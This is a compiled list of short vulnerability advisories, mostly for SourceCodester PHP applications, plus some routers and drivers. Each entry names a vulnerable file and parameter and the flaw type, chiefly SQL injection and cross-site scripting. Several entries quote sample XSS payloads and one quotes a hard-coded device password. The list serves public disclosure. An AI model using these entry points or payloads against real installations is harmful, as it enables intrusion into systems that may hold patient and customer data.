A vulnerability, which was classified as critical, was found in SourceCodester Friendly Island Pizza Website and Ordering System 1.0. This affects an unknown part of the file large.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222699.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Graduate Tracer System 1.0. Affected by this issue is some unknown functionality of the file admin/prof.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-222698 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Online Graduate Tracer System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/search_it.php. The manipulation of the argument input leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222697 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Online Graduate Tracer System 1.0. Affected is an unknown function of the file admin/adminlog.php. The manipulation of the argument user leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222696.
A vulnerability was found in UCMS 1.6 and classified as critical. This issue affects some unknown processing of the file sadmin/fileedit.php of the component System File Management Module. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-222683.
A vulnerability, which was classified as problematic, was found in SourceCodester File Tracker Manager System 1.0. This affects an unknown part of the file normal/borrow1.php. The manipulation of the argument id with the input 1"&gt;&lt;script&gt;alert(1111)&lt;/script&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222663.
A vulnerability, which was classified as critical, has been found in SourceCodester Friendly Island Pizza Website and Ordering System 1.0. Affected by this issue is some unknown functionality of the file deleteorder.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-222662 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester COVID 19 Testing Management System 1.0. Affected by this vulnerability is an unknown functionality of the file patient-report.php of the component POST Parameter Handler. The manipulation of the argument searchdata leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222661 was assigned to this vulnerability.
A vulnerability was found in SourceCodester File Tracker Manager System 1.0. It has been classified as critical. Affected is an unknown function of the file /file_manager/login.php of the component POST Parameter Handler. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222648.
A vulnerability, which was classified as critical, was found in SourceCodester Sales Tracker Management System 1.0. This affects an unknown part of the file admin/clients/manage_client.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222645 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Sales Tracker Management System 1.0. Affected by this issue is some unknown functionality of the file admin/clients/view_client.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222644.
A vulnerability, which was classified as problematic, has been found in IBOS up to 4.5.5. Affected by this issue is some unknown functionality of the file mobil/index.php. The manipulation of the argument accesstoken leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-222608.
A vulnerability, which was classified as critical, has been found in SUL1SS_shop. This issue affects some unknown processing of the file application\merch\controller\Order.php. The manipulation of the argument keyword leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-222599.
A vulnerability classified as problematic was found in SourceCodester Phone Shop Sales Managements System 1.0. This vulnerability affects unknown code of the file /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php of the component CAPTCHA Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-222598 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Health Center Patient Record Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file birthing_print.php. The manipulation of the argument birth_id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222484.
A vulnerability, which was classified as critical, was found in SourceCodester Health Center Patient Record Management System 1.0. This affects an unknown part of the file login.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222483.
A vulnerability was found in ehuacui bbs. It has been declared as problematic. This vulnerability affects unknown code. The manipulation of the argument username leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-222388.
A vulnerability classified as problematic has been found in fastcms. This affects an unknown part of the file admin/TemplateController.java of the component ZIP File Handler. The manipulation leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-222363.
A vulnerability was found in xiaozhuai imageinfo up to 3.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file imageinfo.hpp. The manipulation leads to buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-222362 is the identifier assigned to this vulnerability.
A vulnerability was found in FabulaTech Webcam for Remote Desktop 2.8.42 and classified as problematic. This issue affects some unknown processing in the library ftwebcam.sys of the component Global Variable Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222359.
A vulnerability, which was classified as problematic, was found in ECshop up to 4.1.8. This affects an unknown part of the component New Product Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222357 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in ECshop up to 4.1.8. Affected by this issue is some unknown functionality of the file admin/database.php of the component Backup Database Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222356.
A vulnerability has been found in SourceCodester Health Center Patient Record Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file hematology_print.php. The manipulation of the argument hem_id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222331.
A vulnerability, which was classified as problematic, was found in SourceCodester Computer Parts Sales and Inventory System 1.0. Affected is an unknown function of the component Add Supplier Handler. The manipulation of the argument company_name/province/city/phone_number leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-222330 is the identifier assigned to this vulnerability.
A vulnerability was found in Zhong Bang CRMEB Java 1.3.4. It has been classified as critical. This affects an unknown part of the file /api/admin/system/store/order/list. The manipulation of the argument keywords leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-222261 was assigned to this vulnerability.
A vulnerability was found in KylinSoft kylin-activation on KylinOS and classified as critical. Affected by this issue is some unknown functionality of the component File Import. The manipulation leads to improper authorization. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.11-23 and 1.30.10-5.p23 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-222260.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in DrayTek Vigor 2960 1.5.1.4/1.5.1.5. Affected is an unknown function of the file mainfunction.cgi of the component Web Management Interface. The manipulation of the argument password leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-222258 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability classified as problematic was found in SourceCodester Health Center Patient Record Management System 1.0. This vulnerability affects unknown code of the file admin/fecalysis_form.php. The manipulation of the argument itr_no leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222220.
A vulnerability was found in SourceCodester Electronic Medical Records System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file administrator.php of the component Cookie Handler. The manipulation of the argument userid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222163.
A vulnerability has been found in SourceCodester Computer Parts Sales and Inventory System 1.0 and classified as problematic. This vulnerability affects unknown code of the file customer.php. The manipulation of the argument FIRST_NAME/LAST_NAME/PHONE_NUMBER leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-222106 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Computer Parts Sales and Inventory System 1.0. This affects an unknown part of the file processlogin. The manipulation of the argument user leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222105 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Payroll System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file admin/?page=admin of the component POST Parameter Handler. The manipulation of the argument fullname leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222073 was assigned to this vulnerability.
A vulnerability was found in Drag and Drop Multiple File Upload Contact Form 7 5.0.6.1 on WordPress. It has been classified as critical. Affected is an unknown function of the file admin-ajax.php. The manipulation of the argument upload_name leads to relative path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222072.
A vulnerability was found in FastCMS up to 0.1.5 and classified as problematic. Affected by this issue is some unknown functionality of the component New Article Tab. The manipulation of the argument Title leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-266126 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Online Catering Reservation System 1.0. This affects an unknown part of the file /reservation/add_message.php of the component POST Parameter Handler. The manipulation of the argument fullname leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222003.
A vulnerability was found in SourceCodester Online Student Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file eduauth/edit-class-detail.php. The manipulation of the argument editid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-222002 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Doctors Appointment System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/patient.php of the component Parameter Handler. The manipulation of the argument search leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221827.
A vulnerability, which was classified as critical, was found in SourceCodester Doctors Appointment System 1.0. Affected is an unknown function of the file /admin/add-new.php of the component Parameter Handler. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-221826 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Doctors Appointment System 1.0. This issue affects some unknown processing of the file /admin/edit-doc.php. The manipulation of the argument oldmail leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221825 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Doctors Appointment System 1.0. This vulnerability affects unknown code of the file /admin/doctors.php of the component Parameter Handler. The manipulation of the argument search leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221824.
A vulnerability classified as critical has been found in SourceCodester Doctors Appointment System 1.0. This affects an unknown part of the file create-account.php. The manipulation of the argument newemail leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221823.
A vulnerability was found in SourceCodester Doctors Appointment System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /edoc/doctor/patient.php. The manipulation of the argument search12 leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221821 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Music Gallery Site 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/?page=user/manage. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-221820.
A vulnerability was found in SourceCodester Music Gallery Site 1.0 and classified as critical. This issue affects some unknown processing of the file view_category.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-221819.
A vulnerability, which was classified as critical, has been found in TechPowerUp Ryzen DRAM Calculator 1.2.0.5. This issue affects some unknown processing in the library WinRing0x64.sys. The manipulation leads to improper initialization. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221807.
A vulnerability classified as critical was found in TechPowerUp RealTemp 3.7.0.0. This vulnerability affects unknown code in the library WinRing0x64.sys. The manipulation leads to improper initialization. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. VDB-221806 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in MuYuCMS 2.2. This affects an unknown part of the file /admin.php/update/getFile.html. The manipulation of the argument url leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221805 was assigned to this vulnerability.
A vulnerability was found in MuYuCMS 2.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin.php/accessory/filesdel.html. The manipulation of the argument filedelur leads to relative path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221804.
A vulnerability was found in MuYuCMS 2.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /editor/index.php. The manipulation of the argument file_path leads to relative path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221803.
A vulnerability was found in MuYuCMS 2.2. It has been classified as problematic. Affected is an unknown function of the file /editor/index.php. The manipulation of the argument dir_path leads to relative path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-221802 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Online Pet Shop We App 1.0 and classified as problematic. This vulnerability affects unknown code of the file /pet_shop/admin/orders/update_status.php. The manipulation of the argument oid with the input 1"&gt;&lt;script&gt;alert(1111)&lt;/script&gt; leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221800.
A vulnerability, which was classified as problematic, was found in SourceCodester Simple Responsive Tourism Website 1.0. This affects an unknown part of the file /tourism/rate_review.php. The manipulation of the argument id with the input 1"&gt;&lt;script&gt;alert(1111)&lt;/script&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221799.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Graduate Tracer System 1.0. Affected by this issue is some unknown functionality of the file tracking/admin/add_acc.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-221798 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Class and Exam Timetabling System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/index3.php of the component POST Parameter Handler. The manipulation of the argument password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221797 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Online Reviewer Management System 1.0. Affected is an unknown function of the file /reviewer_0/admins/assessments/pretest/questions-view.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221796.
A vulnerability was found in SourceCodester Dental Clinic Appointment Reservation System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /APR/login.php of the component POST Parameter Handler. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221795.
A vulnerability was found in SourceCodester Dental Clinic Appointment Reservation System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /APR/signup.php of the component POST Parameter Handler. The manipulation of the argument firstname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-221794 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been classified as critical. Affected is an unknown function of the file update_user.php. The manipulation of the argument user_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221784.
A vulnerability has been found in SourceCodester Online Boat Reservation System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /boat/login.php of the component POST Parameter Handler. The manipulation of the argument un leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221755.
A vulnerability classified as critical was found in vox2png 1.0. Affected by this vulnerability is an unknown functionality of the file vox2png.c. The manipulation leads to heap-based buffer overflow. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221743.
A vulnerability was found in SourceCodester Medical Certificate Generator App 1.0. It has been classified as problematic. This affects an unknown part of the component New Record Handler. The manipulation of the argument Firstname/Middlename/Lastname/Suffix/Nationality/Doctor Fullname/Doctor Suffix with the input "&gt;&lt;script&gt;prompt(1)&lt;/script&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-221739.
A vulnerability was found in JP1016 Markdown-Electron and classified as critical. Affected by this issue is some unknown functionality. The manipulation leads to code injection. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-221738 is the identifier assigned to this vulnerability.
A vulnerability has been found in MarkText up to 0.17.1 on Windows and classified as critical. Affected by this vulnerability is an unknown functionality of the component WSH JScript Handler. The manipulation leads to code injection. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-221737 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Typora up to 1.5.5 on Windows. Affected is an unknown function of the component WSH JScript Handler. The manipulation leads to code injection. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. Upgrading to version 1.5.8 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-221736.
A vulnerability, which was classified as problematic, has been found in MuYuCMS 2.2. This issue affects some unknown processing of the file index.php. The manipulation of the argument file_path leads to path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221735.
A vulnerability classified as problematic was found in SourceCodester Sales Tracker Management System 1.0. This vulnerability affects unknown code of the file admin/?page=user/list. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-221734 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Alphaware Simple E-Commerce System 1.0. This affects an unknown part of the file /alphaware/summary.php of the component Payment Handler. The manipulation of the argument amount leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221733 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Moosikay E-Commerce System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Moosikay/order.php of the component POST Parameter Handler. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221732.
A vulnerability, which was classified as problematic, has been found in SourceCodester Online Pizza Ordering System 1.0. This issue affects some unknown processing of the file admin/ajax.php?action=save_user. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221681 was assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Online Pizza Ordering System 1.0. This vulnerability affects unknown code of the file index.php?page=checkout. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221680.
A vulnerability classified as critical has been found in SourceCodester Sales Tracker Management System 1.0. This affects an unknown part of the file admin/?page=user/manage_user of the component Edit User. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-221679.
A vulnerability was found in SourceCodester Yoga Class Registration System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Add Class Entry. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The identifier VDB-221677 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Yoga Class Registration System 1.0. It has been classified as critical. Affected is an unknown function of the component Delete User. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-221676.
A vulnerability was found in SourceCodester Yoga Class Registration System 1.0 and classified as critical. This issue affects some unknown processing of the file admin/registrations/update_status.php of the component Status Update Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-221675.
A vulnerability classified as problematic was found in SourceCodester Online Eyewear Shop 1.0. Affected by this vulnerability is an unknown functionality of the file admin/?page=orders/view_order. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221635.
A vulnerability classified as critical has been found in SourceCodester Sales Tracker Management System 1.0. Affected is an unknown function of the file admin/products/view_product.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. VDB-221634 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Music Gallery Site 1.0. It has been rated as critical. This issue affects some unknown processing of the file Users.php of the component POST Request Handler. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221633 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Music Gallery Site 1.0. It has been declared as critical. This vulnerability affects unknown code of the file Master.php of the component GET Request Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221632.
A vulnerability was found in SourceCodester Music Gallery Site 1.0. It has been classified as critical. This affects an unknown part of the file view_music_details.php of the component GET Request Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221631.
A vulnerability was found in SeaCMS 11.6 and classified as problematic. Affected by this issue is some unknown functionality of the file /data/config.ftp.php of the component Picture Management. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-221630 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Best POS Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file billing/index.php?id=9. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The identifier VDB-221593 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Best POS Management System 1.0. Affected is an unknown function of the file index.php?page=add-category. The manipulation of the argument Name with the input "&gt;&lt;img src=x onerror=prompt(document.domain);&gt; leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-221592.
A vulnerability classified as critical has been found in SourceCodester Music Gallery Site 1.0. This affects an unknown part of the file music_list.php of the component GET Request Handler. The manipulation of the argument cid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221553 was assigned to this vulnerability.
A vulnerability was found in TP-Link Archer C50 V2_160801. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Web Management Interface. The manipulation leads to denial of service. The attack can only be initiated within the local network. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221552.
A vulnerability was found in DolphinPHP up to 1.5.1. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file common.php of the component Incomplete Fix CVE-2021-46097. The manipulation of the argument id leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221551.
A vulnerability has been found in codeprojects Pharmacy Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file add.php of the component Avatar Image Handler. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-221494 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Simple Customer Relationship Management System 1.0. This affects an unknown part of the file /php-scrm/login.php. The manipulation of the argument Password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221493 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Auto Dealer Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /adms/classes/Users.php. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221491.
A vulnerability classified as critical has been found in SourceCodester Auto Dealer Management System 1.0. Affected is an unknown function of the file /adms/admin/?page=user/manage_user. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-221490 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Auto Dealer Management System 1.0. This vulnerability affects unknown code of the file /adms/admin/?page=vehicles/sell_vehicle. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-221482 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Auto Dealer Management System 1.0. This affects an unknown part of the file /adms/admin/?page=vehicles/view_transaction. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221481 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0 and classified as critical. This vulnerability affects unknown code of the file view_prod.php of the component GET Parameter Handler. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The identifier of this vulnerability is VDB-221476.
A vulnerability, which was classified as problematic, was found in cxasm notepad-- 1.22. This affects an unknown part of the component Directory Comparison Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The associated identifier of this vulnerability is VDB-221475.
A vulnerability classified as critical has been found in SourceCodester Employee Task Management System 1.0. Affected is an unknown function of the file changePasswordForEmployee.php. The manipulation leads to improper authentication. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-221454 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file task-details.php. The manipulation of the argument task_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221453 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file edit-task.php. The manipulation of the argument task_id leads to sql injection. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221452.
A vulnerability was found in SourceCodester Simple Food Ordering System 1.0. It has been classified as problematic. This affects an unknown part of the file process_order.php. The manipulation of the argument order leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221451.
A vulnerability was found in phjounin TFTPD64-SE 4.64 and classified as critical. This issue affects some unknown processing of the file tftpd64_svc.exe. The manipulation leads to unquoted search path. An attack has to be approached locally. The complexity of an attack is rather high. The exploitation is known to be difficult. The associated identifier of this vulnerability is VDB-221351.
A vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0 and classified as critical. This vulnerability affects unknown code of the file /php-opos/index.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-221350 is the identifier assigned to this vulnerability.
A vulnerability was found in Netgear WNDR3700v2 1.0.1.14 and classified as problematic. This issue affects some unknown processing of the component Web Interface. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221153 was assigned to this vulnerability.
A vulnerability has been found in Netgear WNDR3700v2 1.0.1.14 and classified as critical. This vulnerability affects unknown code of the component Web Interface. The manipulation leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221152.
A vulnerability was found in Netgear WNDR3700v2 1.0.1.14. It has been rated as problematic. This issue affects some unknown processing of the component Web Management Interface. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221147.
A vulnerability classified as problematic was found in PHPCrazy 1.1.1. This vulnerability affects unknown code of the file admin/admin.php?action=users&amp;mode=info&amp;user=2. The manipulation of the argument username leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-221086 is the identifier assigned to this vulnerability.
A vulnerability was found in Deye/Revolt/Bosswerk Inverter MW3_15U_5406_1.47/MW3_15U_5406_1.471. It has been rated as problematic. This issue affects some unknown processing of the component Access Point Setting Handler. The manipulation with the input 12345678 leads to use of hard-coded password. It is possible to launch the attack on the physical device. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version MW3_16U_5406_1.53 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-220769 was assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Best Online News Portal 1.0. Affected by this vulnerability is an unknown functionality of the file check_availability.php. The manipulation of the argument username leads to exposure of sensitive information through data queries. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-220645 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Best Online News Portal 1.0. Affected is an unknown function of the component Login Page. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220644.
